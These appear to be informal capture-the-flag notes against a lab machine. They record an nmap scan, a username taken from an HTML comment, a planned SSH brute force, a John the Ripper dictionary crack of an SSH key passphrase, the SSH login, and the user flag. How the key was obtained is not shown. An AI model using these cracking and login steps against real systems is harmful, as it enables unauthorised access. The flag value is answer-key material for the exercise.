Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 12:00 EDTNmap scan report for 10.10.52.162Host is up (0.18s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Device type: general purposeRunning: Linux 4.XOS CPE: cpe:/o:linux:linux_kernel:4.15OS details: Linux 4.15Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 146.12 seconds
http enum:
cool site
source has an interesting comment in it:
<!-- john, please add some actual content to the site! lorem ipsum is horrible to look at. -->
possible uname:
john
navigated the rest of the pages. didn’t find anything interesting
gonna run an ssh bruteforce while i do some directory busting
john hash --wordlist=/usr/share/wordlists/rockyou.txt:
Using default input encoding: UTF-8Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashesCost 2 (iteration count) is 1 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusletmein (secretKey) 1g 0:00:00:00 DONE (2025-04-16 12:22) 100.0g/s 51200p/s 51200c/s 51200C/s lover..letmeinUse the "--show" option to display all of the cracked passwords reliablySession completed.
passphrase:
letmein
shell as john:
ssh -i secretKey john@10.10.52.162
user.txt:
a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e
uname -a:
Linux exploitable 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux